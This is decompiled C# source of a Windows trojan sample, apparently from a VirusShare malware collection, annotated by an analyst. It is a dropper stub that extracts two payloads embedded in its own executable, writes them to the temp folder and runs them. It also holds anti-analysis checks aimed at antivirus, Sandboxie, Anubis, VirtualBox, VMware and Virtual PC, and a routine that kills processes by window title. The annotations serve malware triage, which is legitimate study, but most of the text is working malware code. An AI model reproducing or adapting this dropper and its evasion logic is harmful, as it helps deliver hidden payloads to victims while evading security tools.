// Decompiled with JetBrains decompiler
// Type: Stub.Form1
// Assembly: Stub, Version=4.9.5.9, Culture=neutral, PublicKeyToken=null
// MVID: 2229516C-329C-43F8-8C26-63983DECBF21
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.lqpj-3f6ac9dfded1ed0e4c086ec75e7c0ca5a7edfa21307d3cb5a21e884ebe389389.exe

// Analyst notes (derived from the code below only):
//  - Every string constant is fetched through \u000E.\u0002(int). That helper is not
//    defined in this listing; presumably it is an obfuscator's string-decryption
//    routine, so the real process names, registry path, delimiter and window title
//    cannot be read from here. TODO: recover them from the helper or at runtime in a
//    controlled analysis environment.
//  - Member names such as \u0002 and \u0005 are non-printable identifiers and several
//    members share one name (field, parameterless method, event handler); they are
//    told apart by signature.
//  - The num1/num2/num3 + label_N + filtered-catch pattern is how the decompiler
//    renders VB "On Error" handling: num3 tracks the current statement, num1 selects
//    the handler mode and num2 marks an error in progress.

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Windows.Forms;

namespace Stub
{
  /// <summary>
  /// WinForms form of the "Stub" assembly. Its Load handler reads the running
  /// executable, splits the content on a delimiter string, writes two of the pieces
  /// into the temp directory, starts both files and then ends the application.
  /// The class also defines several anti-analysis predicates (process-name, path,
  /// registry-value and string comparisons); no caller of those predicates is visible
  /// in this listing.
  /// </summary>
  [DesignerGenerated]
  public class Form1 : Form
  {
    // Designer component container; the only member released in Dispose.
    private IContainer \u0002;
    // Not referenced anywhere in this listing.
    private object \u0003;
    // Compared against decrypted constants by AntiVirtualBox/AntiVmWare/AntiVirtualPC.
    // Presumably populated by the undecompiled method \u0005() - TODO confirm.
    private string \u0005;
    // Assigned a decrypted string in the constructor; not read in this listing.
    private string \u0008;
    // HKLM subkey opened read-only in the constructor; never closed in visible code.
    private RegistryKey \u0006;
    // Registry value read from \u0006 in the constructor; compared in antiAnubis2.
    private object \u000E;
    // Decrypted string that antiAnubis2 compares the registry value against.
    private string \u000F;

    /// <summary>
    /// Hooks the Load event to the dropper routine, reads one value from an HKLM
    /// subkey (key and value names are decrypted at runtime) and runs the designer
    /// initialisation.
    /// </summary>
    public Form1()
    {
      this.Load += new EventHandler(this.\u0002);
      this.\u0008 = \u000E.\u0002(-374349334);
      // Second argument false = key is opened without write access.
      // NOTE(review): OpenSubKey returns null when the key does not exist, in which
      // case the GetValue call on the next line would throw; no handler is present here.
      this.\u0006 = Registry.LocalMachine.OpenSubKey(\u000E.\u0002(-374349564), false);
      this.\u000E = RuntimeHelpers.GetObjectValue(this.\u0006.GetValue(\u000E.\u0002(-374349481)));
      this.\u000F = \u000E.\u0002(-374349497);
      this.\u0002();
    }

    /// <summary>
    /// Standard designer-generated Dispose: releases the component container when
    /// disposing, then defers to the base class.
    /// </summary>
    [DebuggerNonUserCode]
    protected override void Dispose(bool disposing)
    {
      try
      {
        if (!disposing || this.\u0002 == null)
          return;
        this.\u0002.Dispose();
      }
      finally
      {
        base.Dispose(disposing);
      }
    }

    /// <summary>
    /// Designer initialisation (the shape of InitializeComponent): sets scaling, a
    /// 284x262 client size and the same decrypted string as both Name and Text.
    /// No controls are added.
    /// </summary>
    [DebuggerStepThrough]
    private void \u0002()
    {
      this.SuspendLayout();
      this.AutoScaleDimensions = new SizeF(6f, 13f);
      this.AutoScaleMode = AutoScaleMode.Font;
      this.ClientSize = new Size(284, 262);
      this.Name = \u000E.\u0002(-374349467);
      this.Text = \u000E.\u0002(-374349467);
      this.ResumeLayout(false);
    }

    /// <summary>
    /// Form.Load handler and the core of the stub. It reads the running executable
    /// into a string, splits it on a decrypted delimiter, writes element 1 to
    /// temp + element 3 and element 2 to temp + element 4, starts both files, then
    /// closes the form and ends the application.
    /// </summary>
    /// <remarks>
    /// Observable behaviour for triage: a process opening its own image for reading,
    /// creating two files under Path.GetTempPath() and starting both.
    /// Because num1 is 1, the handler at label_17 resumes at the statement after the
    /// one that failed, so a failure in one step does not stop the later steps from
    /// being attempted.
    /// </remarks>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    private void \u0002(object _param1, EventArgs _param2)
    {
label_0:
      int num1;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        // Handler mode 1: on error, resume with the next numbered statement.
        num1 = 1;
label_1:
        int num3 = 2;
        string tempPath = Path.GetTempPath();
label_2:
        num3 = 3;
        // Open this process's own executable, shared read, as VB file number 1.
        FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
label_3:
        num3 = 4;
        // Pre-size a string buffer to the file length so FileGet fills the whole file.
        string Expression = Strings.Space(checked ((int) FileSystem.LOF(1)));
label_4:
        num3 = 5;
        FileSystem.FileGet(1, ref Expression);
label_5:
        num3 = 6;
        FileSystem.FileClose(1);
label_6:
        num3 = 7;
        // Split the file content on a decrypted delimiter. Elements 1-4 are used below;
        // presumably element 0 is the stub image itself - TODO confirm.
        string[] strArray = Strings.Split(Expression, \u000E.\u0002(-374349679));
label_7:
        num3 = 8;
        // First embedded item: file name from element 3, content from element 1.
        FileSystem.FileOpen(3, tempPath + strArray[3], OpenMode.Binary, OpenAccess.ReadWrite);
label_8:
        num3 = 9;
        FileSystem.FilePut(3, strArray[1], -1L, false);
label_9:
        num3 = 10;
        FileSystem.FileClose(3);
label_10:
        num3 = 11;
        // Second embedded item: file name from element 4, content from element 2.
        FileSystem.FileOpen(5, tempPath + strArray[4], OpenMode.Binary, OpenAccess.ReadWrite);
label_11:
        num3 = 12;
        FileSystem.FilePut(5, strArray[2], -1L, false);
label_12:
        num3 = 13;
        FileSystem.FileClose(5);
label_13:
        num3 = 14;
        // Start both dropped files from the temp directory.
        Process.Start(tempPath + strArray[3]);
label_14:
        num3 = 15;
        Process.Start(tempPath + strArray[4]);
label_15:
        num3 = 16;
        this.Close();
        ProjectData.EndApp();
        goto label_22;
label_17:
        // Error dispatcher: num3 holds the number of the statement that failed;
        // jump to the label of the statement after it.
        num2 = num3;
        switch (num1)
        {
          case 1:
            int num4 = num2 + 1;
            num2 = 0;
            switch (num4)
            {
              case 1:
                goto label_0;
              case 2:
                goto label_1;
              case 3:
                goto label_2;
              case 4:
                goto label_3;
              case 5:
                goto label_4;
              case 6:
                goto label_5;
              case 7:
                goto label_6;
              case 8:
                goto label_7;
              case 9:
                goto label_8;
              case 10:
                goto label_9;
              case 11:
                goto label_10;
              case 12:
                goto label_11;
              case 13:
                goto label_12;
              case 14:
                goto label_13;
              case 15:
                goto label_14;
              case 16:
                goto label_15;
              case 17:
                goto label_22;
            }
            break;
        }
      }
      // The filter only accepts the exception while a handler mode is set and no
      // error is already being handled.
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_17;
      }
      // Reached only when the dispatcher matched no case; -2146828237 is 0x800A0033.
      throw ProjectData.CreateProjectError(-2146828237);
label_22:
      if (num2 == 0)
        return;
      ProjectData.ClearProjectError();
    }

    /// <summary>
    /// Returns true when at least one running process has the decrypted name.
    /// The method name suggests a check for an antivirus process - the actual name
    /// is not visible here.
    /// </summary>
    /// <remarks>
    /// Handler mode 2: any exception is routed to label_2, which ends the application.
    /// </remarks>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    public bool antiKAV()
    {
      int num1;
      bool flag;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = 2;
        flag = Process.GetProcessesByName(\u000E.\u0002(-374349682)).Length >= 1;
        goto label_7;
label_2:
        num2 = -1;
        switch (num1)
        {
          case 2:
            ProjectData.EndApp();
            goto label_7;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_2;
      }
      throw ProjectData.CreateProjectError(-2146828237);
label_7:
      int num3 = flag ? 1 : 0;
      if (num2 == 0)
        return num3 != 0;
      ProjectData.ClearProjectError();
      return num3 != 0;
    }

    /// <summary>
    /// Enumerates all processes and kills every one whose main window title equals a
    /// decrypted string. No caller is visible in this listing.
    /// </summary>
    private void \u0003()
    {
      Process[] processes = Process.GetProcesses();
      int index = 0;
      while (index < processes.Length)
      {
        Process process = processes[index];
        // No error handling around Kill: an exception from it propagates to the caller.
        if (string.Equals(process.MainWindowTitle, \u000E.\u0002(-374349640)))
          process.Kill();
        checked { ++index; }
      }
    }

    /// <summary>
    /// Returns true when at least one running process has the decrypted name.
    /// The method name suggests a Sandboxie process check - the actual name is not
    /// visible here. Any exception ends the application.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    public bool antiSandboxie()
    {
      int num1;
      bool flag;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = 2;
        flag = Process.GetProcessesByName(\u000E.\u0002(-374349603)).Length >= 1;
        goto label_7;
label_2:
        num2 = -1;
        switch (num1)
        {
          case 2:
            ProjectData.EndApp();
            goto label_7;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_2;
      }
      throw ProjectData.CreateProjectError(-2146828237);
label_7:
      int num3 = flag ? 1 : 0;
      if (num2 == 0)
        return num3 != 0;
      ProjectData.ClearProjectError();
      return num3 != 0;
    }

    /// <summary>
    /// Returns true when the full path of the running executable equals the startup
    /// directory plus a decrypted suffix, i.e. when the sample runs under one specific
    /// file name. The comparison is binary (TextCompare is false). Any exception ends
    /// the application.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    public bool antiAnubis()
    {
      int num1;
      bool flag;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = 2;
        flag = Operators.CompareString(Application.ExecutablePath, Application.StartupPath + \u000E.\u0002(-374349621), false) == 0;
        goto label_7;
label_2:
        num2 = -1;
        switch (num1)
        {
          case 2:
            ProjectData.EndApp();
            goto label_7;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_2;
      }
      throw ProjectData.CreateProjectError(-2146828237);
label_7:
      int num3 = flag ? 1 : 0;
      if (num2 == 0)
        return num3 != 0;
      ProjectData.ClearProjectError();
      return num3 != 0;
    }

    /// <summary>
    /// Returns true when the HKLM registry value read in the constructor equals the
    /// decrypted string stored in the field \u000F. Any exception ends the application.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    public bool antiAnubis2()
    {
      int num1;
      bool flag;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = 2;
        flag = Operators.ConditionalCompareObjectEqual(this.\u000E, (object) this.\u000F, false);
        goto label_7;
label_2:
        num2 = -1;
        switch (num1)
        {
          case 2:
            ProjectData.EndApp();
            goto label_7;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_2;
      }
      throw ProjectData.CreateProjectError(-2146828237);
label_7:
      int num3 = flag ? 1 : 0;
      if (num2 == 0)
        return num3 != 0;
      ProjectData.ClearProjectError();
      return num3 != 0;
    }

    /// <summary>
    /// Calls the undecompiled helper \u0005() and returns true when the string field
    /// \u0005 equals a decrypted constant. The method name suggests a VirtualBox
    /// check; what the helper queries is not visible. Any exception ends the application.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    public bool AntiVirtualBox()
    {
      int num1;
      bool flag;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = 2;
        this.\u0005();
        flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349571), false) == 0;
        goto label_7;
label_2:
        num2 = -1;
        switch (num1)
        {
          case 2:
            ProjectData.EndApp();
            goto label_7;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_2;
      }
      throw ProjectData.CreateProjectError(-2146828237);
label_7:
      int num3 = flag ? 1 : 0;
      if (num2 == 0)
        return num3 != 0;
      ProjectData.ClearProjectError();
      return num3 != 0;
    }

    /// <summary>
    /// Same structure as AntiVirtualBox with a different decrypted constant; the
    /// method name suggests a VMware check. Any exception ends the application.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    public bool AntiVmWare()
    {
      int num1;
      bool flag;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = 2;
        this.\u0005();
        flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349793), false) == 0;
        goto label_7;
label_2:
        num2 = -1;
        switch (num1)
        {
          case 2:
            ProjectData.EndApp();
            goto label_7;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_2;
      }
      throw ProjectData.CreateProjectError(-2146828237);
label_7:
      int num3 = flag ? 1 : 0;
      if (num2 == 0)
        return num3 != 0;
      ProjectData.ClearProjectError();
      return num3 != 0;
    }

    /// <summary>
    /// Same structure as AntiVirtualBox with a different decrypted constant; the
    /// method name suggests a Virtual PC check. Any exception ends the application.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    public bool AntiVirtualPC()
    {
      int num1;
      bool flag;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = 2;
        this.\u0005();
        flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349820), false) == 0;
        goto label_7;
label_2:
        num2 = -1;
        switch (num1)
        {
          case 2:
            ProjectData.EndApp();
            goto label_7;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_2;
      }
      throw ProjectData.CreateProjectError(-2146828237);
label_7:
      int num3 = flag ? 1 : 0;
      if (num2 == 0)
        return num3 != 0;
      ProjectData.ClearProjectError();
      return num3 != 0;
    }

    /// <summary>
    /// Helper called by the three Anti* virtual-machine checks before they compare the
    /// string field \u0005. The decompiler could not recover its body, so what it reads
    /// is unknown from this listing. TODO: inspect the IL of this method directly.
    /// </summary>
    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
    private void \u0005()
    {
      // ISSUE: unable to decompile the method.
    }
  }
}